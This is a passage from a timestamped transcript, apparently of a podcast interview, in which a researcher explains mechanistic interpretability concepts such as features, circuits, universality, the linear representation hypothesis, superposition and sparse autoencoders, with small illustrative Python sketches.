04:21:06.940 | neural network runs, that's the activations. And our goal is ultimately to go and understand
04:21:12.540 | these weights. And so the project of mechanistic interpretability is to somehow figure out how do
04:21:17.100 | these weights correspond to algorithms. And in order to do that, you also have to understand
04:21:21.820 | the activations because the activations are like the memory. And if you imagine reverse
04:21:26.540 | engineering a computer program and you have the binary instructions, in order to understand what
04:21:32.060 | a particular instruction means, you need to know what is stored in the memory that it's operating
04:21:37.180 | on. And so those two things are very intertwined. So mechanistic interpretability tends to be
04:21:41.500 | interested in both of those things. Now, there's a lot of work that's interested in those things,
04:21:47.100 | especially there's all this work on probing, which you might see as part of being mechanistic
04:21:52.060 | interpretability, although it's, again, it's just a broad term and not everyone who does that work
04:21:55.980 | would identify as doing mechanistic interpretability. I think the thing that is maybe a little bit
04:22:00.220 | distinctive to the vibe of MechInterp is, I think people working in this space tend to think of
04:22:05.740 | neural networks as, well, maybe one way to say it is the gradient descent is smarter than you,
04:22:10.620 | that, you know, gradient descent is actually really great. The whole reason that we're
04:22:14.220 | understanding these models is because we didn't know how to write them in the first place. The
04:22:16.220 | gradient descent comes up with better solutions than us. And so I think that maybe another thing
04:22:20.460 | about MechInterp is sort of having almost a kind of humility that we won't guess a priori what's
04:22:25.740 | going on inside the model. And so we have to have the sort of bottom up approach where we don't
04:22:29.580 | really assume, you know, we don't assume that we should look for a particular thing and that will
04:22:32.860 | be there and that's how it works. But instead, we look for the bottom up and discover what happens
04:22:36.860 | to exist in these models and study them that way. LR: But, you know, the very fact that it's
04:22:41.980 | possible to do, and as you and others have shown over time, you know, things like universality,
04:22:48.300 | that the wisdom of the gradient descent creates features and circuits, creates things universally
04:22:57.260 | across different kinds of networks that are useful. And that makes the whole field possible.
04:23:02.220 | CM: Yeah. So this is actually, is indeed a really remarkable and exciting thing where it does seem
04:23:07.100 | like, at least to some extent, you know, the same elements, the same features and circuits
04:23:14.380 | form again and again. You know, you can look at every vision model and you'll find curve detectors
04:23:18.060 | and you'll find high-low frequency detectors. And in fact, there's some reason to think that the
04:23:22.060 | same things form across, you know, biological neural networks and artificial neural networks.
04:23:27.100 | So a famous example is vision models in the early layers. They have Gabor filters and there's,
04:23:31.980 | you know, Gabor filters are something that neuroscientists are interested in and have
04:23:34.700 | thought a lot about. We find curve detectors in these models. Curve detectors are also found in
04:23:38.380 | monkeys. We discover these high-low frequency detectors and then some follow-up work went and
04:23:43.100 | discovered them in rats or mice. So they were found first in artificial neural networks and
04:23:48.220 | then found in biological neural networks. You know, there's this really famous result on, like,
04:23:52.060 | grandmother neurons or the Halle Berry neuron from Quiroga et al. And we found very similar
04:23:57.180 | things in vision models when I was still at OpenAI and I was looking at their CLIP
04:24:01.900 | model. And you find these neurons that respond to the same entities in images. And also to give a
04:24:08.460 | concrete example there, we found that there was a Donald Trump neuron. For some reason, I guess,
04:24:11.580 | everyone likes to talk about Donald Trump and Donald Trump was very prominent. It was a very
04:24:16.140 | hot topic at that time. So every neural network we looked at, we would find a dedicated neuron
04:24:20.140 | for Donald Trump. And that was the only person who had always had a dedicated neuron. You know,
04:24:25.900 | sometimes you'd have an Obama neuron, sometimes you'd have a Clinton neuron, but Trump always
04:24:29.980 | had a dedicated neuron. So it responds to, you know, pictures of his face and the word Trump,
04:24:35.820 | like all these things, right? And so it's not responding to a particular example or, like,
04:24:41.020 | it's not just responding to his face, it's abstracting over this general concept, right?
04:24:45.500 | So in any case, that's very similar to these Quiroga et al results. So there's evidence that
04:24:49.260 | this phenomenon of universality, the same things form across both artificial and natural neural
04:24:55.020 | networks. That's a pretty amazing thing if that's true. You know, it suggests that, well, I think
04:25:00.460 | the thing that it suggests is the gradient descent is sort of finding, you know, the right ways to
04:25:05.420 | cut things apart in some sense that many systems converge on and many different neural networks
04:25:10.300 | architectures converge on. There's some natural set of, you know, there's some set of abstractions
04:25:15.260 | that are a very natural way to cut apart the problem and that a lot of systems are going to
04:25:18.300 | converge on. That would be my kind of, you know, I don't know anything about neuroscience. This is
04:25:23.420 | just my kind of wild speculation from what we've seen. Yeah, that would be beautiful if it's sort
04:25:28.380 | of agnostic to the medium of the model that's used to form the representation. Yeah, yeah. And it's,
04:25:36.140 | you know, it's a kind of a wild speculation based, you know, we only have a few data points
04:25:42.300 | that suggest this, but, you know, it does seem like there's some sense in which the same things
04:25:47.100 | form again and again and again and again, both in certainly in natural neural networks and also
04:25:51.340 | artificially or in biology. And the intuition behind that would be that, you know, in order
04:25:56.700 | to be useful in understanding the real world, you need all the same kind of stuff. Yeah, well,
04:26:02.060 | if we pick, I don't know, like the idea of a dog, right? Like, you know, there's some sense in which
04:26:05.820 | the idea of a dog is like a natural category in the universe or something like this, right? Like,
04:26:11.900 | you know, there's some reason, it's not just like a weird quirk of like how humans factor, you know,
04:26:18.140 | think about the world that we have this concept of a dog. It's in some sense, or like if you have
04:26:22.700 | the idea of a line, like there's, you know, like look around us, you know, there are lines, you
04:26:27.580 | know, it's sort of the simplest way to understand this room in some sense is to have the idea of a
04:26:31.820 | line. And so, I think that would be my instinct for why this happens. Yeah, you need a curved
04:26:37.660 | line, you know, to understand a circle and you need all those shapes to understand bigger things.
04:26:41.900 | And yeah, it's a hierarchy of concepts that are formed. Yeah. And like maybe there are ways to go
04:26:45.740 | and describe, you know, images without reference to those things, right? But they're not the
04:26:48.700 | simplest way or the most economical way or something like this. And so systems converge
04:26:52.700 | to these strategies would be my wild, wild hypothesis. Can you talk through some of the
04:26:58.300 | building blocks that we've been referencing of features and circuits? So I think you first
04:27:03.340 | described them in a 2020 paper, Zoom In, An Introduction to Circuits. Absolutely. So maybe
04:27:10.700 | I'll start by just describing some phenomena, and then we can sort of build to the idea of
04:27:16.380 | features and circuits. I spent quite a few years, maybe like five years to some extent,
04:27:24.460 | with other things, studying this one particular model, Inception V1, which is this one vision
04:27:28.780 | model. It was state-of-the-art in 2015. And, you know, very much not state-of-the-art anymore.
04:27:35.420 | And it has, you know, maybe about 10,000 neurons. And I spent a lot of time looking at the
04:27:41.820 | 10,000-odd neurons of Inception V1. And one of the interesting things is, you know,
04:27:49.340 | there are lots of neurons that don't have some obvious interpretable meaning, but there's a lot of
04:27:53.260 | neurons in Inception V1 that do have really clean interpretable meanings. So you find neurons that just
04:28:00.380 | really do seem to detect curves, and you find neurons that really do seem to detect cars, and
04:28:05.020 | car wheels, and car windows, and, you know, floppy ears of dogs, and dogs with long snouts
04:28:10.940 | facing to the right, and dogs with long snouts facing to the left, and, you know, different
04:28:14.540 | kinds of fur. And there's sort of this whole beautiful edge detectors, line detectors,
04:28:18.700 | color contrast detectors, these beautiful things we call high-low frequency detectors.
04:28:22.620 | You know, I think looking at it, I sort of felt like a biologist. You know, you're looking at
04:28:26.860 | this sort of new world of proteins, and you're discovering all these different proteins that
04:28:31.100 | interact. So one way you could try to understand these models is in terms of neurons. You could
04:28:37.580 | try to be like, "Oh, you know, there's a dog-detecting neuron, and here's a car-detecting
04:28:41.340 | neuron." And it turns out you can actually ask how those connect together. So you can go and say,
04:28:45.020 | "Oh, you know, I have this car-detecting neuron. How was it built?" And it turns out, in the
04:28:48.220 | previous layer, it's connected really strongly to a window detector, and a wheel detector,
04:28:52.060 | and a sort of car body detector. And it looks for the window above the car, and the wheels below,
04:28:56.540 | and the car chrome sort of in the middle, sort of everywhere, but especially in the lower part.
04:28:59.740 | And that's sort of a recipe for a car. Like that is, you know, earlier we said the thing we wanted
04:29:05.740 | from mech interp was to get algorithms, to go and get, you know, ask, "What is the algorithm that
04:29:09.660 | runs?" Well, here, we're just looking at the weights of the neural network, and we're reading
04:29:12.300 | off this kind of recipe for detecting cars. It's a very simple crude recipe, but it's there.
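As a rough illustration of what reading that recipe off the weights looks like, here is a toy sketch in Python; the detector names and weight values are made up for illustration, not InceptionV1's actual weights.

```python
# Toy, invented weights: reading the "recipe" for a hypothetical car detector
# off its incoming weights from earlier-layer units, split by spatial position.
incoming = {
    "window_detector":    {"top": +2.1, "middle": +0.3, "bottom": -1.0},
    "wheel_detector":     {"top": -1.2, "middle": +0.2, "bottom": +2.4},
    "car_body_detector":  {"top": +0.4, "middle": +1.8, "bottom": +0.9},
    "dog_snout_detector": {"top": -0.1, "middle": -0.2, "bottom": -0.1},
}

# The "algorithm" we read off: windows expected above, wheels below, body in the middle.
for unit, weights_by_position in incoming.items():
    strongest = max(weights_by_position, key=weights_by_position.get)
    print(f"{unit:>20}: strongest at {strongest} ({weights_by_position[strongest]:+.1f})")
```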
04:29:17.660 | And so we call that a circuit, this connection. Well, okay. So the problem is that not all of the
04:29:23.820 | neurons are interpretable. And there's reason to think, and we can get into this more later,
04:29:29.580 | that there's this superposition hypothesis. There's reason to think that sometimes the right
04:29:34.060 | unit to analyze things in terms of is combinations of neurons. So sometimes it's not that there's a
04:29:40.380 | single neuron that represents, say, a car, but it actually turns out after you detect the car,
04:29:45.100 | the model sort of hides a little bit of the car in the following layer in a bunch of dog detectors.
04:29:50.300 | Why is it doing that? Well, you know, maybe it just doesn't want to do that much work on
04:29:53.580 | cars at that point, and, you know, it's sort of storing it away to go and...
04:29:57.740 | So it turns out then that the sort of subtle pattern of, you know, there's all these neurons
04:30:03.020 | that you think are dog detectors, and maybe they're primarily that, but they all a little
04:30:06.860 | bit contribute to representing a car in that next layer. Okay, so now we can't really think...
04:30:11.980 | There might still be something, I don't know, you could call it like a car concept or something,
04:30:16.380 | but it no longer corresponds to a neuron. So we need some term for these kind of neuron-like
04:30:21.740 | entities, these things that we sort of would have liked the neurons to be, these idealized neurons,
04:30:25.180 | the things that are the nice neurons, but also maybe there's more of them somehow hidden,
04:30:29.420 | and we call those features. And then what are circuits? So circuits are these connections
04:30:34.460 | of features, right? So when we have the car detector, and it's connected to a window detector
04:30:40.140 | and a wheel detector, and it looks for the wheels below and the windows on top, that's a circuit.
04:30:45.500 | So circuits are just collections of features connected by weights, and they implement
04:30:50.140 | algorithms. So they tell us, you know, how are features used? How are they built? How do they
04:30:55.180 | connect together? So maybe it's worth trying to pin down, like, what really is the core hypothesis
04:31:01.900 | here? And I think the core hypothesis is something we call the linear representation hypothesis.
04:31:06.460 | So if we think about the car detector, you know, the more it fires, the more we sort of think of
04:31:11.260 | that as meaning, oh, the model is more and more confident that a car is present. Or, you know,
04:31:17.820 | if there's some combination of neurons that represent a car, you know, the more that combination
04:31:21.260 | fires, the more we think the model thinks there's a car present. This doesn't have to be the case,
04:31:27.500 | right? Like you could imagine something where you have, you know, you have this car detector neuron,
04:31:31.660 | and you think, ah, you know, if it fires, like, you know, between one and two, that means one
04:31:36.540 | thing, but it means something, like, totally different if it's between three and four. That would be a
04:31:40.380 | nonlinear representation. And in principle, that, you know, models could do that. I think it's sort
04:31:44.860 | of inefficient for them to do. If you try to think about how you'd implement computation like that,
04:31:48.700 | it's kind of an annoying thing to do. But in principle, models can do that.
04:31:51.340 | So one way to think about the features and circuits sort of framework for thinking about
04:31:58.700 | things is that we're thinking about things as being linear. We're thinking about there as being,
04:32:02.460 | that if a neuron or a combination of neurons fires more, it sort of, that means more of a
04:32:07.660 | particular thing being detected. And then that gives weights a very clean interpretation as
04:32:12.220 | these edges between these entities, these features, and that edge then has a meaning.
04:32:18.860 | So that's, in some ways, the core thing. It's like, you know, we can talk about this sort of
04:32:26.300 | outside the context of neurons. Are you familiar with the word2vec results? So you have like,
04:32:30.700 | you know, king minus man plus woman equals queen. Well, the reason you can do that kind
04:32:34.860 | of arithmetic is because you have a linear representation. - Can you actually explain
04:32:39.180 | that representation a little bit? So first off, so the feature is a direction of activation.
04:32:44.060 | - Yeah, exactly. - You can think of it that way.
04:32:45.340 | Can you do the minus man plus woman, the word2vec stuff, can you explain what that is?
04:32:51.900 | - Yeah, so there's this very- - It's such a simple,
04:32:54.380 | clean explanation of what we're talking about. - Exactly, yeah. So there's this very famous result,
04:32:58.860 | word2vec by Tomas Mikolov et al. And there's been tons of follow-up work exploring this.
04:33:03.420 | See, so sometimes we have these, we create these word embeddings, where we map every word
04:33:10.860 | to a vector. I mean, that in itself, by the way, is kind of a crazy thing if you haven't thought
04:33:14.620 | about it before, right? Like we're going in and representing, we're turning, you know, like,
04:33:20.460 | like if you just learned about vectors in physics class, right? And I'm like, oh, I'm going to
04:33:23.980 | actually turn every word in the dictionary into a vector. That's kind of a crazy idea. Okay. But
04:33:29.020 | you could imagine, you could imagine all kinds of ways in which you might map words to vectors.
04:33:34.140 | But it seems like when we train neural networks, they like to go and map words to vectors
04:33:41.180 | such that there's sort of linear structure in a particular sense,
04:33:46.140 | which is that directions have meaning. So for instance, if you, there will be some direction
04:33:52.060 | that seems to sort of correspond to gender, and male words will be, you know, far in one direction,
04:33:56.380 | and female words will be in another direction. And the linear representation hypothesis is,
04:34:01.660 | you could sort of think of it roughly as saying that that's actually kind of the
04:34:04.940 | fundamental thing that's going on, that everything is just different directions have meanings,
04:34:09.900 | and adding different direction vectors together can represent concepts. And the Mikolov paper
04:34:15.660 | sort of took that idea seriously. And one consequence of it is that you can, you can
04:34:19.580 | do this game of playing sort of arithmetic with words. So you can do king and you can,
04:34:23.660 | you know, subtract off the word man and add the word woman. And so you're sort of,
04:34:27.420 | you know, going and trying to switch the gender. And indeed, if you do that,
04:34:30.620 | the result will sort of be close to the word queen. And you can, you know, do other things
04:34:34.780 | like you can do, you know, sushi minus Japan plus Italy and get pizza or different things like this,
04:34:42.540 | right? So this is in some sense, the core of the linear representation hypothesis. You can
04:34:47.900 | describe it just as a purely abstract thing about vector spaces, you can describe it as a statement
04:34:52.300 | about the activations of neurons. But it's really about this property of directions having meaning.
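A minimal sketch of that king-minus-man-plus-woman arithmetic, with made-up toy embeddings (hypothetical 4-dimensional vectors built from explicit "gender" and "royalty" directions, not real word2vec vectors):

```python
# Toy illustration of the linear representation idea behind word2vec arithmetic.
import numpy as np

gender  = np.array([1.0, 0.0, 0.0, 0.0])   # +1 roughly "male", -1 roughly "female"
royalty = np.array([0.0, 1.0, 0.0, 0.0])
person  = np.array([0.0, 0.0, 1.0, 0.0])

emb = {
    "man":   person + gender,
    "woman": person - gender,
    "king":  person + gender + royalty,
    "queen": person - gender + royalty,
}

def nearest(v):
    # Cosine similarity against every word in the toy vocabulary.
    sims = {w: v @ u / (np.linalg.norm(v) * np.linalg.norm(u)) for w, u in emb.items()}
    return max(sims, key=sims.get)

print(nearest(emb["king"] - emb["man"] + emb["woman"]))  # -> "queen"
```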
04:34:59.660 | And in some ways, it's even a little subtler than that. It's really, I think, mostly about this
04:35:03.420 | property of being able to add things together, that you can sort of independently modify,
04:35:08.460 | say, gender and royalty or, you know, cuisine type or country and the concept of food by
04:35:17.580 | adding them. Do you think the linear representation hypothesis holds as the models scale?
04:35:23.100 | So, so far, I think everything I have seen is consistent with this hypothesis. And it doesn't
04:35:28.220 | have to be that way, right? Like, like, you can write down neural networks, where you write weights
04:35:33.260 | such that they don't have linear representations, where the right way to understand them is not,
04:35:37.580 | is not in terms of linear representations. But I think every natural neural network I've seen
04:35:42.700 | has this property. There's been one paper recently, that there's been some sort of pushing
04:35:50.220 | around the edge. So I think there's been some work recently studying multi-dimensional features,
04:35:53.900 | where rather than a single direction, it's more like a manifold of directions. This to me still
04:35:59.820 | seems like a linear representation. And then there's been some other papers suggesting that
04:36:04.300 | maybe in very small models, you get nonlinear representations. I think that the jury's still
04:36:10.780 | out on that. But I think everything that we've seen so far has been consistent with the linear
04:36:16.140 | representation hypothesis. And that's wild. It doesn't have to be that way. And yet, I think
04:36:21.580 | there's a lot of evidence that certainly at least this is very, very widespread. And so far, the
04:36:26.300 | evidence is consistent with it. And I think, you know, one thing you might say is you might say,
04:36:30.780 | well, Christopher, you know, that's a lot, you know, to go and sort of ride on, you know,
04:36:35.980 | if we don't know for sure this is true, and you're sort of, you know, you're investing in neural
04:36:39.420 | networks as though it is true, you know, isn't that, isn't that interesting? Well, you know,
04:36:43.260 | but I think actually, there's a virtue in taking hypotheses seriously and pushing them as far as
04:36:48.940 | they can go. So it might be that someday we discover something that isn't consistent with
04:36:53.660 | linear representation hypothesis. But science is full of hypotheses and theories that were wrong.
04:36:58.300 | And we learned a lot by sort of working under them as a sort of an assumption. And then going
04:37:05.740 | and pushing them as far as we can, I guess, I guess this is sort of the heart of what Kuhn would
04:37:09.020 | call normal science. I don't know, if you want, we can talk a lot about philosophy of science.
04:37:15.580 | - That leads to the paradigm shift. So yeah, I love it taking the hypothesis seriously and
04:37:20.700 | take it to a natural conclusion. Same with the scaling hypothesis, same.
04:37:24.700 | - Exactly, exactly. And one of my colleagues, Tom Henighan, who is a former physicist,
04:37:31.980 | made this really nice analogy to me of caloric theory, where, you know, once upon a time,
04:37:38.300 | we thought that heat was actually, you know, this thing called caloric. And like the reason,
04:37:43.020 | you know, hot objects, you know, would warm up cool objects is like the caloric is flowing through
04:37:47.740 | them. And like, you know, because we're so used to thinking about heat, you know, in terms of
04:37:52.940 | the modern and modern theory, you know, that seems kind of silly, but it's actually very hard to
04:37:56.860 | construct an experiment that sort of disproves the caloric hypothesis. And, you know, you can
04:38:03.820 | actually do a lot of really useful work believing in caloric. For example, it turns out that the
04:38:08.700 | original combustion engines were developed by people who believed in the caloric theory.
04:38:12.860 | So I think there's a virtue in taking hypotheses seriously, even when they might be wrong.
04:38:17.260 | - Yeah, there's a deep philosophical truth to that. That's kind of how I feel about space travel,
04:38:23.580 | like colonizing Mars. There's a lot of people that criticize that. I think if you just assume
04:38:27.980 | we have to colonize Mars in order to have a backup for human civilization, even if that's not true,
04:38:33.420 | that's going to produce some interesting engineering and even scientific breakthroughs,
04:38:38.540 | I think. - Yeah, well, and actually,
04:38:39.980 | this is another thing that I think is really interesting. So, you know, there's a way in
04:38:44.540 | which I think it can be really useful for society to have people almost irrationally dedicated to
04:38:52.220 | investigating particular hypotheses. Because, well, it takes a lot to sort of maintain scientific
04:38:58.940 | morale and really push on something when, you know, most scientific hypotheses end up being
04:39:03.820 | wrong. You know, a lot of science doesn't work out. And yet, it's very useful to go, you know,
04:39:11.820 | there's a joke about Geoff Hinton, which is that Geoff Hinton has discovered how the brain works
04:39:17.740 | every year for the last 50 years. But, you know, I say that with like, you know, with really deep
04:39:25.020 | respect because in fact, that's actually, you know, that led to him doing some really great work.
04:39:29.260 | - Yeah, he won the Nobel Prize now, who's laughing now.
04:39:31.820 | - Exactly, exactly. I think one wants to be able to pop up and sort of recognize
04:39:37.260 | the appropriate level of confidence. But I think there's also a lot of value in just being like,
04:39:41.500 | you know, I'm going to essentially assume, I'm going to condition on this problem being
04:39:46.540 | possible or this being broadly the right approach. And I'm just going to go and assume that for a
04:39:51.260 | while and go and work within that and push really hard on it. And, you know, if society has lots of
04:39:58.140 | people doing that for different things, that's actually really useful in terms of going and
04:40:02.940 | getting to, you know, either really ruling things out, right? We can be like, well,
04:40:10.540 | you know, that didn't work and we know that somebody tried hard. Or going and getting to
04:40:14.540 | something that it does teach us something about the world.
04:40:16.620 | - So another interesting hypothesis is the superposition hypothesis.
04:40:20.380 | Can you describe what superposition is?
04:40:22.060 | - Yeah. So earlier we were talking about word2vec, right? And we were talking about how,
04:40:25.420 | you know, maybe you have one direction that corresponds to gender and maybe another that
04:40:28.940 | corresponds to royalty and another one that corresponds to Italy and another one that
04:40:32.700 | corresponds to, you know, food and all of these things. Well, you know, oftentimes maybe these
04:40:37.820 | word embeddings, they might be 500 dimensions, a thousand dimensions. And so if you believe that
04:40:44.060 | all of those directions were orthogonal, then you could only have, you know, 500 concepts. And,
04:40:50.220 | you know, I love pizza. But, like, if I was going to go and, like, give the, like, 500
04:40:55.020 | most important concepts in, you know, the English language, probably Italy wouldn't be -- it's not
04:41:00.860 | obvious at least that Italy would be one of them, right? Because you have to have things like plural
04:41:04.540 | and singular and verb and noun and adjective. And, you know, there's a lot of things we have
04:41:11.980 | to get to before we get to Italy and Japan. And, you know, there's a lot of countries in the world.
04:41:17.420 | And so how might it be that models could, you know, simultaneously have the linear
04:41:24.060 | representation hypothesis be true and also represent more things than they have directions?
04:41:30.060 | So what does that mean? Well, okay. So if linear representation hypothesis is true,
04:41:33.980 | something interesting has to be going on. Now, I'll tell you one more interesting thing before
04:41:38.540 | we go and we do that, which is, you know, earlier we were talking about all these polysemantic
04:41:43.420 | neurons, right? These neurons that, you know, when we were looking at Inception V1, there's
04:41:47.260 | these nice neurons that, like, the car detector and the curve detector and so on that respond to
04:41:51.020 | lots of, you know, to very coherent things. But there's lots of neurons that respond to a bunch of
04:41:55.100 | unrelated things. And that's also an interesting phenomenon. And it turns out as well that even
04:42:00.220 | these neurons that are really, really clean, if you look at the weak activations, right? So if you
04:42:03.980 | look at, like, you know, the activations where it's, like, activating 5% of the, you know, of
04:42:10.140 | the maximum activation, it's really not the core thing that it's expecting, right? So if you look
04:42:14.380 | at a curve detector, for instance, and you look at the places where it's 5% active, you know,
04:42:19.100 | you could interpret it just as noise, or it could be that it's doing something else there.
04:42:23.100 | Okay. So how could that be? Well, there's this amazing thing in mathematics called compressed
04:42:31.740 | sensing. And it's actually this very surprising fact where if you have a high-dimensional space
04:42:37.740 | and you project it into a low-dimensional space, ordinarily, you can't go and sort of unproject it
04:42:44.380 | and get back your high-dimensional vector, right? You threw information away. This is like,
04:42:47.500 | you know, you can't invert a rectangular matrix. You can only invert square matrices.
04:42:52.620 | But it turns out that that's actually not quite true. If I tell you that the high-dimensional
04:42:59.580 | vector was sparse, so it's mostly zeros, then it turns out that you can often go and find
04:43:04.780 | back the high-dimensional vector with very high probability. So that's a surprising fact,
04:43:13.180 | right? It says that, you know, you can have this high-dimensional vector space, and as long as
04:43:17.660 | things are sparse, you can project it down, you can have a lower-dimensional projection of it,
04:43:22.620 | and that works. So the superposition hypothesis is saying that that's what's going on in neural
04:43:27.900 | networks. For instance, that's what's going on in word embeddings, that word embeddings are able
04:43:31.740 | to simultaneously have directions be the meaningful thing, and by exploiting the fact that they're
04:43:36.620 | operating on a fairly high-dimensional space, they're actually -- and the fact that these
04:43:40.300 | concepts are sparse, right? Like, you know, you usually aren't talking about Japan and Italy at
04:43:44.220 | the same time. You know, most of those concepts, you know, in most sentences, Japan and Italy are
04:43:49.100 | both zero. They're not present at all. And if that's true, then you can go and have it be the
04:43:56.060 | case that you can have many more of these sort of directions that are meaningful, these features,
04:44:03.020 | than you have dimensions. And similarly, when we're talking about neurons, you can have many
04:44:06.540 | more concepts than you have neurons. So that's the high-level superposition hypothesis.
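A small sketch of that compressed-sensing intuition, using scikit-learn's orthogonal matching pursuit to recover a sparse 1000-dimensional vector from a random 100-dimensional projection. The dimensions and sparsity level are arbitrary illustrative choices:

```python
import numpy as np
from sklearn.linear_model import OrthogonalMatchingPursuit

rng = np.random.default_rng(0)
n_concepts, n_neurons, n_active = 1000, 100, 5   # 1000 "concepts", 100 "neurons"

# Sparse high-dimensional vector: only 5 of the 1000 concepts are "on".
x = np.zeros(n_concepts)
x[rng.choice(n_concepts, n_active, replace=False)] = rng.normal(size=n_active)

# Random projection down to 100 dimensions (the "superposition" step).
P = rng.normal(size=(n_neurons, n_concepts)) / np.sqrt(n_neurons)
y = P @ x

# Sparse recovery: find the sparse x consistent with the low-dimensional y.
omp = OrthogonalMatchingPursuit(n_nonzero_coefs=n_active).fit(P, y)
print("recovered the right concepts:",
      set(np.flatnonzero(omp.coef_)) == set(np.flatnonzero(x)))
```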
04:44:11.980 | Now, it has this even wilder implication, which is to go and say that neural networks are -- it
04:44:21.820 | may not just be the case that the representations are like this, but the computation may also be
04:44:25.980 | like this. You know, the connections between all of them. And so, in some sense, neural networks
04:44:30.060 | may be shadows of much larger, sparser neural networks. And what we see are these projections.
04:44:37.180 | And the super -- you know, the strongest version of the superposition hypothesis would be to take
04:44:41.100 | that really seriously and sort of say, you know, there actually is, in some sense, this upstairs
04:44:45.660 | model, this, you know, where the neurons are really sparse and all interpretable, and there's,
04:44:50.700 | you know, the weights between them are these really sparse circuits. And that's what we're
04:44:55.100 | studying. And the thing that we're observing is the shadow of it, and so we need to find
04:45:01.580 | the original object. >> And the process of learning is trying to construct a compression
04:45:07.420 | of the upstairs model that doesn't lose too much information in the projection.
04:45:11.420 | >> Yeah, it's finding how to fit it efficiently, or something like this. The gradient descent is
04:45:15.900 | doing this. And in fact, so this sort of says that gradient descent, you know, it could just
04:45:19.820 | represent a dense neural network, but it sort of says that gradient descent is implicitly searching
04:45:23.420 | over the space of extremely sparse models that could be projected into this low-dimensional space.
04:45:28.860 | And this large body of work of people going and trying to study sparse neural networks,
04:45:33.340 | right, where you go and you have -- you could design neural networks, right, where the edges
04:45:36.700 | are sparse and the activations are sparse. And, you know, my sense is that work has generally -- it
04:45:41.580 | feels very principled, right? It makes so much sense. And yet, that work hasn't really panned
04:45:45.980 | out that well, is my impression, broadly. And I think that a potential answer for that is that
04:45:52.060 | actually, the neural network is already sparse in some sense. The whole time you were trying to
04:45:57.500 | go and do this, gradient descent was actually, behind
04:46:00.300 | the scenes, going and searching more efficiently than you could through the space of sparse models,
04:46:04.300 | and going and learning whatever sparse model was most efficient, and then figuring out how
04:46:08.780 | to fold it down nicely to go and run conveniently on your GPU, which does, you know, nice dense
04:46:13.260 | matrix multiplies, and that you just can't beat that. >> How many concepts do you think can be
04:46:18.540 | shoved into a neural network? >> Depends on how sparse they are. So, there's probably an upper
04:46:23.100 | bound from the number of parameters, right? Because you have to have -- you still have to have,
04:46:27.020 | you know, weights that go and connect them together. So, that's one upper bound. There are,
04:46:32.540 | in fact, all these lovely results from compressed sensing, and the Johnson-Lindenstrauss lemma,
04:46:36.940 | and things like this, that they basically tell you that if you have a vector space, and you want to
04:46:42.300 | have almost orthogonal vectors, which is sort of probably the thing that you want here, right? So,
04:46:46.780 | you're going to say, well, you know, I'm going to give up on having my concepts, my features be
04:46:50.540 | strictly orthogonal, but I'd like them to not interfere that much. I'm going to ask them to
04:46:53.980 | be almost orthogonal. Then this would say that, you know, once you set a
04:46:59.100 | threshold for what you're willing to accept in terms of how much cosine similarity there is,
04:47:04.700 | the number of almost-orthogonal vectors you can fit is actually exponential in the number of neurons that you have. So, at some point,
04:47:08.540 | that's not going to even be the limiting factor. But, you know, there's some beautiful results
04:47:12.780 | there. In fact, it's probably even better than that in some sense, because that's sort of for
04:47:17.420 | saying that, you know, any random set of features could be active. But, in fact, the features have
04:47:21.420 | sort of a correlational structure where some features, you know, are more likely to co-occur,
04:47:25.420 | and other ones are less likely to co-occur. And so, neural networks, my guess would be,
04:47:28.940 | can do very well in terms of going and packing things in, to the point that that's probably
04:47:35.660 | not the limiting factor. How does the problem of polysemanticity enter the picture here?
04:47:40.940 | Polysemanticity is this phenomenon we observe, where we look at many neurons,
04:47:44.300 | and the neuron doesn't just sort of represent one concept. It's not a clean feature. It responds to
04:47:49.660 | a bunch of unrelated things. And superposition, you can think of as being a hypothesis that explains
04:47:55.500 | the observation of polysemanticity. So, polysemanticity is this observed phenomenon,
04:48:01.180 | and superposition is a hypothesis that would explain it, along with some other things.
04:48:05.580 | So, that makes mech interp more difficult.
04:48:08.620 | Right. So, if you're trying to understand things in terms of individual neurons,
04:48:11.820 | and you have polysemantic neurons, you're in an awful lot of trouble, right? I mean,
04:48:15.660 | the easiest answer is like, okay, well, you're looking at the neurons. You're trying to understand
04:48:18.700 | them. This one responds to a lot of things. It doesn't have a nice meaning. Okay, that's bad.
04:48:23.820 | Another thing you could ask is, ultimately, we want to understand the weights. And if you have
04:48:28.380 | two polysemantic neurons, and each one responds to three things, and then the other neuron
04:48:33.020 | responds to three things, and you have a weight between them, what does that mean? Does it mean
04:48:36.220 | that like all three, you know, like there's these nine interactions going on? It's a very weird
04:48:41.260 | thing. But there's also a deeper reason, which is related to the fact that neural networks operate
04:48:46.460 | on really high dimensional spaces. So, I said that our goal was, you know, to understand neural
04:48:50.540 | networks and understand the mechanisms. And one thing you might say is like, well, why not? It's
04:48:55.420 | just a mathematical function. Why not just look at it, right? Like, you know, one of the earliest
04:48:59.180 | projects I did studied these neural networks that mapped two-dimensional spaces to two-dimensional
04:49:03.180 | spaces. And you can sort of interpret them in this beautiful way as like bending manifolds.
04:49:07.260 | Why can't we do that? Well, you know, as you have a higher dimensional space,
04:49:11.660 | the volume of that space in some senses is exponential in the number of inputs you have.
04:49:17.500 | And so, you can't just go and visualize that. So, we somehow need to break that apart. We need to
04:49:22.380 | somehow break that exponential space into a bunch of things that we, you know, some non-exponential
04:49:28.540 | number of things that we can reason about independently. And the independence is crucial
04:49:33.340 | because it's the independence that allows you to not have to think about, you know,
04:49:36.380 | all the exponential combinations of things. And things being monosemantic, things only having
04:49:43.340 | one meaning, things having a meaning, that is the key thing that allows you to think about
04:49:48.140 | them independently. And so, I think that's -- if you want the deepest reason why we want to have
04:49:55.340 | interpretable monosemantic features, I think that's really the deep reason.
04:49:58.540 | >> And so, the goal here, as your recent work has been aiming at, is how do we extract the
04:50:03.580 | monosemantic features from a neural net that has polysemantic features and all this mess?
04:50:09.980 | >> Yes, we observe these polysemantic neurons and we hypothesize that what's going on is
04:50:14.060 | superposition. And if superposition is what's going on, there's actually a sort of well-established
04:50:19.340 | technique that is sort of the principled thing to do, which is dictionary learning. And it turns
04:50:25.020 | out if you do dictionary learning, in particular, if you do sort of a nice, efficient way that in
04:50:29.180 | some sense sort of nicely regularizes it as well, called a sparse autoencoder, if you train a sparse
04:50:33.740 | autoencoder, these beautiful interpretable features start to just fall out where there
04:50:37.660 | weren't any beforehand. And so, that's not a thing that you would necessarily predict, right?
04:50:42.700 | But it turns out that that works very, very well. To me, that seems like some non-trivial validation
04:50:49.260 | of linear representations and superposition. >> So, with dictionary learning, you're not
04:50:53.180 | looking for particular kind of categories. You don't know what they are. They just emerge.
04:50:56.940 | >> Exactly, yeah. And this gets back to our earlier point, right? When we're not making
04:50:59.420 | assumptions, gradient descent is smarter than us. So, we're not making assumptions about what's
